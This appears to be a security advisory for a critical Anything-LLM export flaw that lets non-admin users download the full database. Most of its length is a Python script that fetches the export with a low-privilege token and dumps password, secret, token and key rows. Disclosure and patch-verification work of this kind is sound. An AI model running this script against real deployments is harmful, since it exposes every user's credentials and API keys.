Critical

anything-llm

Sensitive Information Exposure via Export Feature

A vulnerability in Anything-LLM allows default-role and manager-role users to export and read the entire system database, including usernames, passwords, and API keys, even though neither role is meant to have that level of access. Versions prior to 1.0.0 are affected; the issue was patched in version 1.0.0.

Available publicly on Mar 03 2024

CVSS: 9.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N)

Credit: ranjit-git

Threat Overview

The vulnerability arises from an export feature that lets default-role and manager users download the entire database file. These roles are intended to have limited permissions, but the export endpoint does not enforce an admin-only check, so any authenticated user can bypass the role model and read data they are never shown in the UI. The exposed material includes authentication credentials and API keys, which is enough to impersonate other accounts and use the instance's integrations, so a low-privilege foothold can be escalated to full compromise of the deployment.

Attack Scenario

An attacker who holds a default or manager user account starts by calling the export feature to download the database file. Using a crafted Python script, the attacker authenticates with their own token, triggers a data export, and retrieves the exported database file from the server. Opening the database, the attacker extracts usernames, passwords, and API keys for every account, including administrators, and uses them for unauthorized access and further exploitation of the system.
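The scenario above, as an added example that is not the researcher's script and not code from the Anything-LLM project: a Python script that calls the export endpoint with a low-privilege user's bearer token, locates the SQLite database inside the returned archive by its magic bytes, and lists every table that carries credential-like columns. The endpoint path (`/api/system/data-export`), the `Authorization: Bearer` header, the zip archive format, and the `users` / `api_keys` table layout in the sample are all assumptions; adjust them to the instance under test. `build_sample_export()` builds a constructed archive so the triage half runs offline.

```python
"""Added example: triage of an Anything-LLM database export fetched with a
default- or manager-role token. Endpoint path, auth header, archive format and
table/column names are assumptions, not taken from the project."""
import io
import sqlite3
import sys
import tempfile
import zipfile
from pathlib import Path
from urllib.request import Request, urlopen

EXPORT_PATH = "/api/system/data-export"  # assumed route; verify on the target
SQLITE_MAGIC = b"SQLite format 3\x00"     # 16-byte header of every SQLite 3 file
# Column-name fragments treated as credential material (assumed naming).
SENSITIVE_FRAGMENTS = ("password", "secret", "token", "key")


def fetch_export(base_url: str, token: str) -> bytes:
    """Authenticate with the low-privilege user's JWT and trigger the export.
    In vulnerable versions the response body is the archive itself."""
    req = Request(base_url.rstrip("/") + EXPORT_PATH,
                  headers={"Authorization": f"Bearer {token}"})
    with urlopen(req, timeout=60) as resp:
        return resp.read()


def find_sqlite_members(archive: bytes) -> list[str]:
    """Locate SQLite files inside the zip by magic bytes, not by file name."""
    found = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                if fh.read(len(SQLITE_MAGIC)) == SQLITE_MAGIC:
                    found.append(info.filename)
    return found


def extract_sensitive(db_bytes: bytes) -> dict[str, list[dict]]:
    """Return every row of every table that has a credential-like column.
    The bytes touch disk only for the duration of the query."""
    with tempfile.NamedTemporaryFile(suffix=".db", delete=False) as tmp:
        tmp.write(db_bytes)
        path = tmp.name
    findings: dict[str, list[dict]] = {}
    try:
        con = sqlite3.connect(path)
        con.row_factory = sqlite3.Row
        tables = [r[0] for r in con.execute(
            "SELECT name FROM sqlite_master WHERE type='table' "
            "AND name NOT LIKE 'sqlite_%'")]
        for table in tables:
            cols = [r[1] for r in con.execute(f'PRAGMA table_info("{table}")')]
            if any(frag in c.lower() for c in cols for frag in SENSITIVE_FRAGMENTS):
                rows = con.execute(f'SELECT * FROM "{table}"').fetchall()
                findings[table] = [dict(r) for r in rows]
        con.close()
    finally:
        Path(path).unlink(missing_ok=True)
    return findings


def triage_export(archive: bytes) -> dict[str, dict[str, list[dict]]]:
    """Map each SQLite member of the archive to its sensitive tables."""
    result = {}
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for name in find_sqlite_members(archive):
            result[name] = extract_sensitive(zf.read(name))
    return result


def build_sample_export() -> bytes:
    """Constructed sample: a zip holding a small SQLite DB shaped like the
    users and api_keys tables the advisory describes (assumed schema)."""
    with tempfile.NamedTemporaryFile(suffix=".db", delete=False) as tmp:
        path = tmp.name
    con = sqlite3.connect(path)
    con.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        CREATE TABLE api_keys (id INTEGER PRIMARY KEY, secret TEXT, createdBy INTEGER);
        CREATE TABLE workspaces (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO users VALUES (1, 'admin', '$2b$10$constructedhash', 'admin');
        INSERT INTO users VALUES (2, 'alice', '$2b$10$anotherhash', 'default');
        INSERT INTO api_keys VALUES (1, 'sk-constructed-sample-key', 1);
        INSERT INTO workspaces VALUES (1, 'research');
    """)
    con.commit()
    con.close()
    db_bytes = Path(path).read_bytes()
    Path(path).unlink()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("storage/anythingllm.db", db_bytes)   # assumed member name
        zf.writestr("storage/settings.json", "{}")        # non-DB member, skipped
    return buf.getvalue()


if __name__ == "__main__":
    if len(sys.argv) == 3:
        report = triage_export(fetch_export(sys.argv[1], sys.argv[2]))
    else:
        report = triage_export(build_sample_export())  # offline demo
    for member, tables in report.items():
        for table, rows in tables.items():
            print(f"{member}: {table}: {len(rows)} row(s) with credential-like columns")
```

Run it as `python triage.py https://llm.example.internal <default-user-jwt>` against a test instance; with no arguments it walks the constructed sample instead. The same script doubles as a post-upgrade check: on a patched (1.0.0 or later) instance the request made with a default-role token should be refused, so `fetch_export` is expected to raise `urllib.error.HTTPError` rather than return an archive. Matching columns by name fragment rather than a fixed schema means the triage still works if the exported database has tables the advisory does not mention.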

Who is affected

Every deployment of Anything-LLM prior to version 1.0.0 in which non-admin accounts exist is affected. Any default-role or manager user can read the credentials and API keys of every other user, so the confidentiality of all stored data and the integrity of every account, including administrators, is at risk. Operators should upgrade to 1.0.0 or later and treat user passwords and API keys on affected instances as exposed.
